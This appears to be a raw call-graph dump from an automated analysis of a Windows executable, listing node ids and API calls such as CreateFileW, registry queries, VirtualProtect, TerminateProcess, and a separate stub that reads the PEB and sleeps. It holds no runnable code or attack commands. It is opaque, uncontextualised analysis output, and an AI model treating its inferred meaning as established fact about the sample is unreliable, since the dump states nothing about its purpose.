98077->98070 98078 acdbb3 65 API calls 98077->98078 98078->98077 98080 b122ce 79 API calls 98079->98080 98081 b12c7c 98080->98081 98081->98075 98082 b12c80 DeleteFileW 98081->98082 98082->98046 98083->97813 98084->97848 98085->97861 98087 aa6d91 98086->98087 98088 aa6d34 98086->98088 98089 aa93b2 22 API calls 98087->98089 98088->98087 98090 aa6d3f 98088->98090 98095 aa6d62 __fread_nolock 98089->98095 98091 aa6d5a 98090->98091 98092 ae4c9d 98090->98092 98100 aa6f34 22 API calls 98091->98100 98093 abfddb 22 API calls 98092->98093 98096 ae4ca7 98093->98096 98095->97953 98097 abfe0b 22 API calls 98096->98097 98098 ae4cda 98097->98098 98099->97963 98100->98095 98101->98012 98102->98014 98103->98065 98105 b13013 98104->98105 98106 b12fff SetFileTime CloseHandle 98104->98106 98105->98046 98106->98105 98107->98048 98108->98056 98110 aa7510 53 API calls 98109->98110 98111 b27f90 98110->98111 98136 b27fd5 ISource 98111->98136 98147 b28cd3 98111->98147 98113 b28281 98114 b2844f 98113->98114 98118 b2828f 98113->98118 98187 b28ee4 60 API calls 98114->98187 98117 b2845e 98117->98118 98119 b2846a 98117->98119 98160 b27e86 98118->98160 98119->98136 98120 aa7510 53 API calls 98135 b28049 98120->98135 98125 b282c8 98175 abfc70 98125->98175 98128 b28302 98182 aa63eb 22 API calls 98128->98182 98129 b282e8 98181 b1359c 82 API calls __wsopen_s 98129->98181 98132 b282f3 GetCurrentProcess TerminateProcess 98132->98128 98133 b28311 98183 aa6a50 22 API calls 98133->98183 98135->98113 98135->98120 98135->98136 98179 b0417d 22 API calls __fread_nolock 98135->98179 98180 b2851d 42 API calls _strftime 98135->98180 98136->97890 98137 b2832a 98146 b28352 98137->98146 98184 ab04f0 22 API calls 98137->98184 98139 b284c5 98139->98136 98142 b284d9 FreeLibrary 98139->98142 98140 b28341 98185 b28b7b 75 API calls 98140->98185 98142->98136 98145 aaaceb 23 API calls 98145->98146 98146->98139 98146->98145 98186 ab04f0 22 API calls 98146->98186 98188 b28b7b 75 API calls 98146->98188 98148 aaaec9 22 API calls 98147->98148 98149 b28cee CharLowerBuffW 98148->98149 98189 b08e54 98149->98189 98153 aaa961 22 API calls 98154 b28d2a 98153->98154 98155 aa6d25 22 API calls 98154->98155 98156 b28d3e 98155->98156 98157 aa93b2 22 API calls 98156->98157 98159 b28d48 _wcslen 98157->98159 98158 b28e5e _wcslen 98158->98135 98159->98158 98196 b2851d 42 API calls _strftime 98159->98196 98161 b27ea1 98160->98161 98162 b27eec 98160->98162 98163 abfe0b 22 API calls 98161->98163 98166 b29096 98162->98166 98164 b27ec3 98163->98164 98164->98162 98165 abfddb 22 API calls 98164->98165 98165->98164 98167 b292ab ISource 98166->98167 98174 b290ba _strcat _wcslen 98166->98174 98167->98125 98168 aab6b5 39 API calls 98168->98174 98169 aab567 39 API calls 98169->98174 98170 aab38f 39 API calls 98170->98174 98171 aa7510 53 API calls 98171->98174 98172 acea0c 21 API calls ___std_exception_copy 98172->98174 98174->98167 98174->98168 98174->98169 98174->98170 98174->98171 98174->98172 98199 b0efae 24 API calls _wcslen 98174->98199 98176 abfc85 98175->98176 98177 abfd1d VirtualProtect 98176->98177 98178 abfceb 98176->98178 98177->98178 98178->98128 98178->98129 98179->98135 98180->98135 98181->98132 98182->98133 98183->98137 98184->98140 98185->98146 98186->98146 98187->98117 98188->98146 98190 b08e74 _wcslen 98189->98190 98191 b08f63 98190->98191 98194 b08ea9 98190->98194 98195 b08f68 98190->98195 98191->98153 98191->98159 98194->98191 98197 abce60 41 API calls 98194->98197 98195->98191 98198 abce60 41 API calls 98195->98198 98196->98158 98197->98194 98198->98195 98199->98174 98229 aa6270 98200->98229 98202 aa9fd2 98203 aaa4a1 22 API calls 98202->98203 98204 aa9fec 98203->98204 98204->97895 98207 aef7c4 98239 b096e2 84 API calls __wsopen_s 98207->98239 98208 aef699 98214 abfddb 22 API calls 98208->98214 98209 aaa6c3 22 API calls 98226 aa9eb5 98209->98226 98210 aaa405 98210->98204 98240 b096e2 84 API calls __wsopen_s 98210->98240 98216 aef754 98214->98216 98215 aef7d2 98217 aaa4a1 22 API calls 98215->98217 98219 abfe0b 22 API calls 98216->98219 98218 aef7e8 98217->98218 98218->98204 98220 aaa12c __fread_nolock 98219->98220 98220->98207 98220->98210 98222 aaa587 22 API calls 98222->98226 98223 aaaec9 22 API calls 98224 aaa0db CharUpperBuffW 98223->98224 98235 aaa673 22 API calls 98224->98235 98226->98202 98226->98207 98226->98208 98226->98209 98226->98210 98226->98220 98226->98222 98226->98223 98227 aaa4a1 22 API calls 98226->98227 98234 aa4573 41 API calls _wcslen 98226->98234 98236 aa48c8 23 API calls 98226->98236 98237 aa49bd 22 API calls __fread_nolock 98226->98237 98238 aaa673 22 API calls 98226->98238 98227->98226 98228->97899 98230 abfe0b 22 API calls 98229->98230 98231 aa6295 98230->98231 98232 abfddb 22 API calls 98231->98232 98233 aa62a3 98232->98233 98233->98226 98234->98226 98235->98226 98236->98226 98237->98226 98238->98226 98239->98215 98240->98204 98241->97915 98243 aaae01 98242->98243 98246 aaae1c ISource 98242->98246 98244 aaaec9 22 API calls 98243->98244 98245 aaae09 CharUpperBuffW 98244->98245 98245->98246 98246->97709 98248 aaacae 98247->98248 98249 aaacd1 98248->98249 98284 b1359c 82 API calls __wsopen_s 98248->98284 98249->97762 98252 aefadb 98251->98252 98253 aaad92 98251->98253 98254 abfddb 22 API calls 98253->98254 98255 aaad99 98254->98255 98285 aaadcd 98255->98285 98259 aef86f 98258->98259 98262 aaa718 98258->98262 98260 aef87f 98259->98260 98304 b04d4a 22 API calls ISource 98259->98304 98263 aaa746 98262->98263 98268 aaa763 ISource 98262->98268 98292 aaaf8a 98262->98292 98265 aaa74c 98263->98265 98266 aaaf8a 22 API calls 98263->98266 98265->98268 98300 aab090 98265->98300 98266->98265 98268->97763 98269->97763 98270->97712 98271->97751 98272->97718 98273->97751 98274->97751 98275->97762 98276->97762 98277->97762 98278->97762 98279->97762 98280->97740 98281->97751 98282->97746 98283->97751 98284->98249 98289 aaaddd 98285->98289 98286 aaadb6 98286->97762 98287 abfddb 22 API calls 98287->98289 98288 aaa961 22 API calls 98288->98289 98289->98286 98289->98287 98289->98288 98290 aaa8c7 22 API calls 98289->98290 98291 aaadcd 22 API calls 98289->98291 98290->98289 98291->98289 98293 aaaf98 98292->98293 98299 aaafc0 ISource 98292->98299 98294 aaafa6 98293->98294 98295 aaaf8a 22 API calls 98293->98295 98296 aaafac 98294->98296 98297 aaaf8a 22 API calls 98294->98297 98295->98294 98298 aab090 22 API calls 98296->98298 98296->98299 98297->98296 98298->98299 98299->98263 98301 aab09b ISource 98300->98301 98303 aab0d6 ISource 98301->98303 98305 abce17 22 API calls ISource 98301->98305 98303->98268 98304->98260 98305->98303 98309 ab06bd 98306->98309 98314 ab0863 ISource 98306->98314 98307 ab0d36 98310 ab0847 ISource 98307->98310 98328 abacd5 39 API calls 98307->98328 98309->98307 98309->98310 98309->98314 98316 ab081e 98309->98316 98317 ab082a ISource 98309->98317 98310->97778 98312 af5ffd 98315 af600f 98312->98315 98327 accf65 39 API calls 98312->98327 98314->98307 98314->98310 98314->98312 98314->98317 98315->97778 98316->98317 98319 af5e15 98316->98319 98317->98310 98317->98312 98326 abce17 22 API calls ISource 98317->98326 98325 accf65 39 API calls 98319->98325 98320->97778 98321->97784 98322->97784 98323->97771 98324->97784 98325->98319 98326->98317 98327->98315 98328->98310 98329 ad8402 98334 ad81be 98329->98334 98332 ad842a 98335 ad81ef try_get_first_available_module 98334->98335 98342 ad8338 98335->98342 98349 ac8e0b 40 API calls 2 library calls 98335->98349 98337 ad83ee 98353 ad27ec 26 API calls ___std_exception_copy 98337->98353 98339 ad8343 98339->98332 98346 ae0984 98339->98346 98341 ad838c 98341->98342 98350 ac8e0b 40 API calls 2 library calls 98341->98350 98342->98339 98352 acf2d9 20 API calls __dosmaperr 98342->98352 98344 ad83ab 98344->98342 98351 ac8e0b 40 API calls 2 library calls 98344->98351 98354 ae0081 98346->98354 98348 ae099f 98348->98332 98349->98341 98350->98344 98351->98342 98352->98337 98353->98339 98355 ae008d BuildCatchObjectHelperInternal 98354->98355 98356 ae009b 98355->98356 98359 ae00d4 98355->98359 98412 acf2d9 20 API calls __dosmaperr 98356->98412 98358 ae00a0 98413 ad27ec 26 API calls ___std_exception_copy 98358->98413 98365 ae065b 98359->98365 98364 ae00aa __fread_nolock 98364->98348 98415 ae042f 98365->98415 98368 ae068d 98447 acf2c6 20 API calls __dosmaperr 98368->98447 98369 ae06a6 98433 ad5221 98369->98433 98372 ae0692 98448 acf2d9 20 API calls __dosmaperr 98372->98448 98373 ae06ab 98374 ae06cb 98373->98374 98375 ae06b4 98373->98375 98446 ae039a CreateFileW 98374->98446 98449 acf2c6 20 API calls __dosmaperr 98375->98449 98379 ae06b9 98450 acf2d9 20 API calls __dosmaperr 98379->98450 98381 ae0781 GetFileType 98383 ae078c GetLastError 98381->98383 98384 ae07d3 98381->98384 98382 ae0756 GetLastError 98452 acf2a3 20 API calls __dosmaperr 98382->98452 98453 acf2a3 20 API calls __dosmaperr 98383->98453 98455 ad516a 21 API calls 2 library calls 98384->98455 98386 ae0704 98386->98381 98386->98382 98451 ae039a CreateFileW 98386->98451 98388 ae079a CloseHandle 98388->98372 98390 ae07c3 98388->98390 98454 acf2d9 20 API calls __dosmaperr 98390->98454 98392 ae0749 98392->98381 98392->98382 98394 ae07f4 98396 ae0840 98394->98396 98456 ae05ab 72 API calls 3 library calls 98394->98456 98395 ae07c8 98395->98372 98400 ae086d 98396->98400 98457 ae014d 72 API calls 4 library calls 98396->98457 98399 ae0866 98399->98400 98402 ae087e 98399->98402 98401 ad86ae __wsopen_s 29 API calls 98400->98401 98403 ae00f8 98401->98403 98402->98403 98404 ae08fc CloseHandle 98402->98404 98414 ae0121 LeaveCriticalSection __wsopen_s 98403->98414 98458 ae039a CreateFileW 98404->98458 98406 ae0927 98407 ae095d 98406->98407 98408 ae0931 GetLastError 98406->98408 98407->98403 98459 acf2a3 20 API calls __dosmaperr 98408->98459 98410 ae093d 98460 ad5333 21 API calls 2 library calls 98410->98460 98412->98358 98413->98364 98414->98364 98416 ae046a 98415->98416 98417 ae0450 98415->98417 98461 ae03bf 98416->98461 98417->98416 98468 acf2d9 20 API calls __dosmaperr 98417->98468 98420 ae045f 98469 ad27ec 26 API calls ___std_exception_copy 98420->98469 98422 ae04a2 98423 ae04d1 98422->98423 98470 acf2d9 20 API calls __dosmaperr 98422->98470 98431 ae0524 98423->98431 98472 acd70d 26 API calls 2 library calls 98423->98472 98426 ae051f 98428 ae059e 98426->98428 98426->98431 98427 ae04c6 98471 ad27ec 26 API calls ___std_exception_copy 98427->98471 98473 ad27fc 11 API calls _abort 98428->98473 98431->98368 98431->98369 98432 ae05aa 98434 ad522d BuildCatchObjectHelperInternal 98433->98434 98476 ad2f5e EnterCriticalSection 98434->98476 98437 ad5234 98438 ad5259 98437->98438 98442 ad52c7 EnterCriticalSection 98437->98442 98444 ad527b 98437->98444 98480 ad5000 98438->98480 98439 ad52a4 __fread_nolock 98439->98373 98442->98444 98445 ad52d4 LeaveCriticalSection 98442->98445 98477 ad532a 98444->98477 98445->98437 98446->98386 98447->98372 98448->98403 98449->98379 98450->98372 98451->98392 98452->98372 98453->98388 98454->98395 98455->98394 98456->98396 98457->98399 98458->98406 98459->98410 98460->98407 98463 ae03d7 98461->98463 98462 ae03f2 98462->98422 98463->98462 98474 acf2d9 20 API calls __dosmaperr 98463->98474 98465 ae0416 98475 ad27ec 26 API calls ___std_exception_copy 98465->98475 98467 ae0421 98467->98422 98468->98420 98469->98416 98470->98427 98471->98423 98472->98426 98473->98432 98474->98465 98475->98467 98476->98437 98488 ad2fa6 LeaveCriticalSection 98477->98488 98479 ad5331 98479->98439 98481 ad4c7d _abort 20 API calls 98480->98481 98483 ad5012 98481->98483 98482 ad501f 98484 ad29c8 _free 20 API calls 98482->98484 98483->98482 98489 ad3405 11 API calls 2 library calls 98483->98489 98486 ad5071 98484->98486 98486->98444 98487 ad5147 EnterCriticalSection 98486->98487 98487->98444 98488->98479 98489->98483 98490 aa105b 98495 aa344d 98490->98495 98492 aa106a 98526 ac00a3 29 API calls __onexit 98492->98526 98494 aa1074 98496 aa345d __wsopen_s 98495->98496 98497 aaa961 22 API calls 98496->98497 98498 aa3513 98497->98498 98499 aa3a5a 24 API calls 98498->98499 98500 aa351c 98499->98500 98527 aa3357 98500->98527 98503 aa33c6 22 API calls 98504 aa3535 98503->98504 98505 aa515f 22 API calls 98504->98505 98506 aa3544 98505->98506 98507 aaa961 22 API calls 98506->98507 98508 aa354d 98507->98508 98509 aaa6c3 22 API calls 98508->98509 98510 aa3556 RegOpenKeyExW 98509->98510 98511 ae3176 RegQueryValueExW 98510->98511 98515 aa3578 98510->98515 98512 ae320c RegCloseKey 98511->98512 98513 ae3193 98511->98513 98512->98515 98523 ae321e _wcslen 98512->98523 98514 abfe0b 22 API calls 98513->98514 98516 ae31ac 98514->98516 98515->98492 98518 aa5722 22 API calls 98516->98518 98517 aa4c6d 22 API calls 98517->98523 98519 ae31b7 RegQueryValueExW 98518->98519 98520 ae31d4 98519->98520 98522 ae31ee ISource 98519->98522 98521 aa6b57 22 API calls 98520->98521 98521->98522 98522->98512 98523->98515 98523->98517 98524 aa9cb3 22 API calls 98523->98524 98525 aa515f 22 API calls 98523->98525 98524->98523 98525->98523 98526->98494 98528 ae1f50 __wsopen_s 98527->98528 98529 aa3364 GetFullPathNameW 98528->98529 98530 aa3386 98529->98530 98531 aa6b57 22 API calls 98530->98531 98532 aa33a4 98531->98532 98532->98503 98533 aa1098 98538 aa42de 98533->98538 98537 aa10a7 98539 aaa961 22 API calls 98538->98539 98540 aa42f5 GetVersionExW 98539->98540 98541 aa6b57 22 API calls 98540->98541 98542 aa4342 98541->98542 98543 aa93b2 22 API calls 98542->98543 98552 aa4378 98542->98552 98544 aa436c 98543->98544 98546 aa37a0 22 API calls 98544->98546 98545 aa441b GetCurrentProcess IsWow64Process 98547 aa4437 98545->98547 98546->98552 98548 aa444f LoadLibraryA 98547->98548 98549 ae3824 GetSystemInfo 98547->98549 98550 aa449c GetSystemInfo 98548->98550 98551 aa4460 GetProcAddress 98548->98551 98555 aa4476 98550->98555 98551->98550 98554 aa4470 GetNativeSystemInfo 98551->98554 98552->98545 98553 ae37df 98552->98553 98554->98555 98556 aa447a FreeLibrary 98555->98556 98557 aa109d 98555->98557 98556->98557 98558 ac00a3 29 API calls __onexit 98557->98558 98558->98537 98559 17c5e68 98573 17c3a78 98559->98573 98561 17c5f57 98576 17c5d58 98561->98576 98579 17c6f98 GetPEB 98573->98579 98575 17c4103 98575->98561 98577 17c5d61 Sleep 98576->98577 98578 17c5d6f 98577->98578 98580 17c6fc2 98579->98580 98580->98575 98581 aaf7bf 98582 aaf7d3 98581->98582 98583 aafcb6 98581->98583 98584 aafcc2 98582->98584 98586 abfddb 22 API calls 98582->98586 98585 aaaceb 23 API calls 98583->98585 98587 aaaceb 23 API calls 98584->98587 98585->98584 98588 aaf7e5 98586->98588 98590 aafd3d 98587->98590 98588->98584 98589 aaf83e 98588->98589 98588->98590 98592 ab1310 235 API calls 98589->98592 98608 aaed9d ISource 98589->98608 98617 b11155 22 API calls 98590->98617 98605 aaec76 ISource 98592->98605 98593 af4beb 98621 b1359c 82 API calls __wsopen_s 98593->98621 98594 aafef7 98602 aaa8c7 22 API calls 98594->98602 98594->98608 98595 ab06a0 41 API calls 98595->98605 98597 abfddb 22 API calls 98597->98605 98598 aaf3ae ISource 98598->98608 98618 b1359c 82 API calls __wsopen_s 98598->98618 98599 af4600 98604 aaa8c7 22 API calls 98599->98604 98599->98608 98600 af4b0b 98619 b1359c 82 API calls __wsopen_s 98600->98619 98602->98608 98604->98608 98605->98593 98605->98594 98605->98595 98605->98597 98605->98598 98605->98599 98605->98600 98607 aaa8c7 22 API calls 98605->98607 98605->98608 98609 aafbe3 98605->98609 98610 aaa961 22 API calls 98605->98610 98612 ac00a3 29 API calls pre_c_initialization 98605->98612 98614 ac0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98605->98614 98615 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98605->98615 98616 ab01e0 235 API calls 2 library calls 98605->98616 98607->98605 98609->98598 98609->98608 98611 af4bdc 98609->98611 98610->98605 98620 b1359c 82 API calls __wsopen_s 98611->98620 98612->98605 98614->98605 98615->98605 98616->98605 98617->98608 98618->98608 98619->98608 98620->98593 98621->98608 98622 ab0b9d 98632 ab0ba6 __fread_nolock 98622->98632 98623 aa7510 53 API calls 98623->98632 98624 af5cb8 98634 aa4a88 22 API calls __fread_nolock 98624->98634 98626 af5cc4 98630 aaa8c7 22 API calls 98626->98630 98631 ab0847 __fread_nolock 98626->98631 98627 ab0bf7 98629 aaa587 22 API calls 98627->98629 98628 abfddb 22 API calls 98628->98632 98629->98631 98630->98631 98632->98623 98632->98624 98632->98627 98632->98628 98632->98631 98633 abfe0b 22 API calls 98632->98633 98633->98632 98634->98626 98635 ad90fa 98636 ad9107 98635->98636 98640 ad911f 98635->98640 98685 acf2d9 20 API calls __dosmaperr 98636->98685 98638 ad910c 98686 ad27ec 26 API calls ___std_exception_copy 98638->98686 98641 ad917a 98640->98641 98647 ad9117 98640->98647 98687 adfdc4 98640->98687 98642 acd955 __fread_nolock 26 API calls 98641->98642 98644 ad9192 98642->98644 98655 ad8c32 98644->98655 98646 ad9199 98646->98647 98648 acd955 __fread_nolock 26 API calls 98646->98648 98649 ad91c5 98648->98649 98649->98647 98650 acd955 __fread_nolock 26 API calls 98649->98650 98651 ad91d3 98650->98651 98651->98647 98652 acd955 __fread_nolock 26 API calls 98651->98652 98653 ad91e3 98652->98653 98654 acd955 __fread_nolock 26 API calls 98653->98654 98654->98647 98656 ad8c3e BuildCatchObjectHelperInternal 98655->98656 98657 ad8c5e 98656->98657 98658 ad8c46 98656->98658 98660 ad8d24 98657->98660 98663 ad8c97 98657->98663 98693 acf2c6 20 API calls __dosmaperr 98658->98693 98700 acf2c6 20 API calls __dosmaperr 98660->98700 98662 ad8c4b 98694 acf2d9 20 API calls __dosmaperr 98662->98694 98666 ad8cbb 98663->98666 98667 ad8ca6 98663->98667 98664 ad8d29 98701 acf2d9 20 API calls __dosmaperr 98664->98701 98692 ad5147 EnterCriticalSection 98666->98692 98695 acf2c6 20 API calls __dosmaperr 98667->98695 98671 ad8cb3 98702 ad27ec 26 API calls ___std_exception_copy 98671->98702 98672 ad8cab 98696 acf2d9 20 API calls __dosmaperr 98672->98696 98673 ad8cc1 98675 ad8cdd 98673->98675 98676 ad8cf2 98673->98676 98697 acf2d9 20 API calls __dosmaperr 98675->98697 98680 ad8d45 __fread_nolock 38 API calls 98676->98680 98678 ad8c53 __fread_nolock 98678->98646 98681 ad8ced 98680->98681 98699 ad8d1c LeaveCriticalSection __wsopen_s 98681->98699 98682 ad8ce2 98698 acf2c6 20 API calls __dosmaperr 98682->98698 98685->98638 98686->98647 98688 ad3820 _strftime 21 API calls 98687->98688 98689 adfddf 98688->98689 98690 ad29c8 _free 20 API calls 98689->98690 98691 adfde9 98690->98691 98691->98641 98692->98673 98693->98662 98694->98678 98695->98672 98696->98671 98697->98682 98698->98681 98699->98678 98700->98664 98701->98671 98702->98678 98703 ac03fb 98704 ac0407 BuildCatchObjectHelperInternal 98703->98704 98732 abfeb1 98704->98732 98706 ac040e 98707 ac0561 98706->98707 98710 ac0438 98706->98710 98759 ac083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98707->98759 98709 ac0568 98760 ac4e52 28 API calls _abort 98709->98760 98719 ac0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98710->98719 98743 ad247d 98710->98743 98712 ac056e 98761 ac4e04 28 API calls _abort 98712->98761 98716 ac0576 98717 ac0457 98723 ac04d8 98719->98723 98755 ac4e1a 38 API calls 2 library calls 98719->98755 98722 ac04de 98724 ac04f3 98722->98724 98751 ac0959 98723->98751 98756 ac0992 GetModuleHandleW 98724->98756 98726 ac04fa 98726->98709 98727 ac04fe 98726->98727 98728 ac0507 98727->98728 98757 ac4df5 28 API calls _abort 98727->98757 98758 ac0040 13 API calls 2 library calls 98728->98758 98731 ac050f 98731->98717 98733 abfeba 98732->98733 98762 ac0698 IsProcessorFeaturePresent 98733->98762 98735 abfec6 98763 ac2c94 10 API calls 3 library calls 98735->98763 98737 abfecb 98738 abfecf 98737->98738 98764 ad2317 98737->98764 98738->98706 98741 abfee6 98741->98706 98744 ad2494 98743->98744 98745 ac0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98744->98745 98746 ac0451 98745->98746 98746->98717 98747 ad2421 98746->98747 98748 ad2450 98747->98748 98749 ac0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98748->98749 98750 ad2479 98749->98750 98750->98719 98807 ac2340 98751->98807 98754 ac097f 98754->98722 98755->98723 98756->98726 98757->98728 98758->98731 98759->98709 98760->98712 98761->98716 98762->98735 98763->98737 98768 add1f6 98764->98768 98767 ac2cbd 8 API calls 3 library calls 98767->98738 98769 add20f 98768->98769 98770 add213 98768->98770 98771 ac0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98769->98771 98770->98769 98774 ad4bfb 98770->98774 98772 abfed8 98771->98772 98772->98741 98772->98767 98775 ad4c07 BuildCatchObjectHelperInternal 98774->98775 98786 ad2f5e EnterCriticalSection 98775->98786 98777 ad4c0e 98787 ad50af 98777->98787 98779 ad4c1d 98785 ad4c2c 98779->98785 98800 ad4a8f 29 API calls 98779->98800 98782 ad4c27 98801 ad4b45 GetStdHandle GetFileType 98782->98801 98784 ad4c3d __fread_nolock 98784->98770 98802 ad4c48 LeaveCriticalSection _abort 98785->98802 98786->98777 98788 ad50bb BuildCatchObjectHelperInternal 98787->98788 98789 ad50df 98788->98789 98790 ad50c8 98788->98790 98803 ad2f5e EnterCriticalSection 98789->98803 98804 acf2d9 20 API calls __dosmaperr 98790->98804 98793 ad50cd 98805 ad27ec 26 API calls ___std_exception_copy 98793->98805 98796 ad5000 __wsopen_s 21 API calls 98798 ad50eb 98796->98798 98797 ad50d7 __fread_nolock 98797->98779 98798->98796 98799 ad5117 98798->98799 98806 ad513e LeaveCriticalSection _abort 98799->98806 98800->98782 98801->98785 98802->98784 98803->98798 98804->98793 98805->98797 98806->98797 98808 ac096c GetStartupInfoW 98807->98808 98808->98754 98809 ad5cb5 98810 acd955 __fread_nolock 26 API calls 98809->98810 98811 ad5cc3 98810->98811 98812 ad5cd1 98811->98812 98813 ad5cf0 98811->98813 98824 acf2d9 20 API calls __dosmaperr 98812->98824 98815 ad5cfd 98813->98815 98820 ad5d0a 98813->98820 98825 acf2d9 20 API calls __dosmaperr 98815->98825 98817 ad5d9a 98826 ad5edb 62 API calls 2 library calls 98817->98826 98819 ad5cd6 98820->98817 98820->98819 98821 adf89b __fread_nolock 26 API calls 98820->98821 98822 ad5d8d 98820->98822 98821->98822 98822->98817 98823 adfdc4 21 API calls 98822->98823 98823->98817 98824->98819 98825->98819 98826->98819 98827 aa1033 98832 aa4c91 98827->98832 98831 aa1042 98833 aaa961 22 API calls 98832->98833 98834 aa4cff 98833->98834 98840 aa3af0 98834->98840 98837 aa4d9c 98838 aa1038 98837->98838 98843 aa51f7 22 API calls __fread_nolock 98837->98843 98839 ac00a3 29 API calls __onexit 98838->98839 98839->98831 98844 aa3b1c 98840->98844 98843->98837 98845 aa3b0f 98844->98845 98846 aa3b29 98844->98846 98845->98837 98846->98845 98847 aa3b30 RegOpenKeyExW 98846->98847 98847->98845 98848 aa3b4a RegQueryValueExW 98847->98848 98849 aa3b6b 98848->98849 98850 aa3b80 RegCloseKey 98848->98850 98849->98850 98850->98845 98851 af3f75 98862 abceb1 98851->98862 98853 af3f8b 98855 af4006 98853->98855 98871 abe300 23 API calls 98853->98871 98856 aabf40 235 API calls 98855->98856 98857 af4052 98856->98857 98859 af4a88 98857->98859 98873 b1359c 82 API calls __wsopen_s 98857->98873 98860 af3fe6 98860->98857 98872 b11abf 22 API calls 98860->98872 98863 abcebf 98862->98863 98864 abced2 98862->98864 98867 aaaceb 23 API calls 98863->98867 98865 abced7 98864->98865 98866 abcf05 98864->98866 98868 abfddb 22 API calls 98865->98868 98869 aaaceb 23 API calls 98866->98869 98870 abcec9 98867->98870 98868->98870 98869->98870 98870->98853 98871->98860 98872->98855 98873->98859 98874 aa3156 98877 aa3170 98874->98877 98878 aa3187 98877->98878 98879 aa31eb 98878->98879 98880 aa318c 98878->98880 98918 aa31e9 98878->98918 98882 ae2dfb 98879->98882 98883 aa31f1 98879->98883 98884 aa3199 98880->98884 98885 aa3265 PostQuitMessage 98880->98885 98881 aa31d0 DefWindowProcW 98886 aa316a 98881->98886 98933 aa18e2 10 API calls 98882->98933 98887 aa31f8 98883->98887 98888 aa321d SetTimer RegisterWindowMessageW 98883->98888 98890 ae2e7c 98884->98890 98891 aa31a4 98884->98891 98885->98886 98893 ae2d9c 98887->98893 98894 aa3201 KillTimer 98887->98894 98888->98886 98896 aa3246 CreatePopupMenu 98888->98896 98938 b0bf30 34 API calls ___scrt_fastfail 98890->98938 98897 aa31ae 98891->98897 98898 ae2e68 98891->98898 98902 ae2dd7 MoveWindow 98893->98902 98903 ae2da1 98893->98903 98929 aa30f2 Shell_NotifyIconW ___scrt_fastfail 98894->98929 98895 ae2e1c 98934 abe499 42 API calls 98895->98934 98896->98886 98899 ae2e4d 98897->98899 98900 aa31b9 98897->98900 98922 b0c161 98898->98922 98899->98881 98937 b00ad7 22 API calls 98899->98937 98907 aa31c4 98900->98907 98908 aa3253 98900->98908 98901 ae2e8e 98901->98881 98901->98886 98902->98886 98909 ae2dc6 SetFocus 98903->98909 98910 ae2da7 98903->98910 98907->98881 98935 aa30f2 Shell_NotifyIconW ___scrt_fastfail 98907->98935 98931 aa326f 44 API calls ___scrt_fastfail 98908->98931 98909->98886 98910->98907 98913 ae2db0 98910->98913 98911 aa3214 98930 aa3c50 DeleteObject DestroyWindow 98911->98930 98932 aa18e2 10 API calls 98913->98932 98916 aa3263 98916->98886 98918->98881 98920 ae2e41 98936 aa3837 49 API calls ___scrt_fastfail 98920->98936 98923 b0c276 98922->98923 98924 b0c179 ___scrt_fastfail 98922->98924 98923->98886 98939 aa3923 98924->98939 98926 b0c1a0 98927 b0c25f KillTimer SetTimer 98926->98927 98928 b0c251 Shell_NotifyIconW 98926->98928 98927->98923 98928->98927 98929->98911 98930->98886 98931->98916 98932->98886 98933->98895 98934->98907 98935->98920 98936->98918 98937->98918 98938->98901 98940 aa393f 98939->98940 98941 aa3a13 98939->98941 98942 aa6270 22 API calls 98940->98942 98941->98926 98943 aa394d 98942->98943 98944 aa395a 98943->98944 98945 ae3393 LoadStringW 98943->98945 98946 aa6b57 22 API calls 98944->98946 98947 ae33ad 98945->98947 98948 aa396f 98946->98948 98951 aaa8c7 22 API calls 98947->98951 98955 aa3994 ___scrt_fastfail 98947->98955 98949 aa397c 98948->98949 98950 ae33c9 98948->98950 98949->98947 98952 aa3986 98949->98952 98953 aa6350 22 API calls 98950->98953 98951->98955 98954 aa6350 22 API calls 98952->98954 98956 ae33d7 98953->98956 98954->98955 98958 aa39f9 Shell_NotifyIconW 98955->98958 98956->98955 98957 aa33c6 22 API calls 98956->98957 98959 ae33f9 98957->98959 98958->98941 98960 aa33c6 22 API calls 98959->98960 98960->98955 98961 aa2e37 98962 aaa961 22 API calls 98961->98962 98963 aa2e4d 98962->98963 99040 aa4ae3 98963->99040 98965 aa2e6b 98966 aa3a5a 24 API calls 98965->98966 98967 aa2e7f 98966->98967 98968 aa9cb3 22 API calls 98967->98968 98969 aa2e8c 98968->98969 98970 aa4ecb 94 API calls 98969->98970 98971 aa2ea5 98970->98971 98972 aa2ead 98971->98972 98973 ae2cb0 98971->98973 98977 aaa8c7 22 API calls 98972->98977 98974 b12cf9 80 API calls 98973->98974 98975 ae2cc3 98974->98975 98976 ae2ccf 98975->98976 98978 aa4f39 68 API calls 98975->98978 98981 aa4f39 68 API calls 98976->98981 98979 aa2ec3 98977->98979 98978->98976 99054 aa6f88 22 API calls 98979->99054 98983 ae2ce5 98981->98983 98982 aa2ecf 98984 aa9cb3 22 API calls 98982->98984 99070 aa3084 22 API calls 98983->99070 98985 aa2edc 98984->98985 99055 aaa81b 41 API calls 98985->99055 98987 aa2eec 98990 aa9cb3 22 API calls 98987->98990 98989 ae2d02 99071 aa3084 22 API calls 98989->99071 98991 aa2f12 98990->98991 99056 aaa81b 41 API calls 98991->99056 98993 ae2d1e 98995 aa3a5a 24 API calls 98993->98995 98996 ae2d44 98995->98996 99072 aa3084 22 API calls 98996->99072 98997 aa2f21 99000 aaa961 22 API calls 98997->99000 98999 ae2d50 99001 aaa8c7 22 API calls 98999->99001 99002 aa2f3f 99000->99002 99003 ae2d5e 99001->99003 99057 aa3084 22 API calls 99002->99057 99073 aa3084 22 API calls 99003->99073 99006 aa2f4b 99058 ac4a28 40 API calls 3 library calls 99006->99058 99007 ae2d6d 99012 aaa8c7 22 API calls 99007->99012 99009 aa2f59 99009->98983 99010 aa2f63 99009->99010 99059 ac4a28 40 API calls 3 library calls 99010->99059 99014 ae2d83 99012->99014 99013 aa2f6e 99013->98989 99015 aa2f78 99013->99015 99074 aa3084 22 API calls 99014->99074 99060 ac4a28 40 API calls 3 library calls 99015->99060 99017 ae2d90 99019 aa2f83 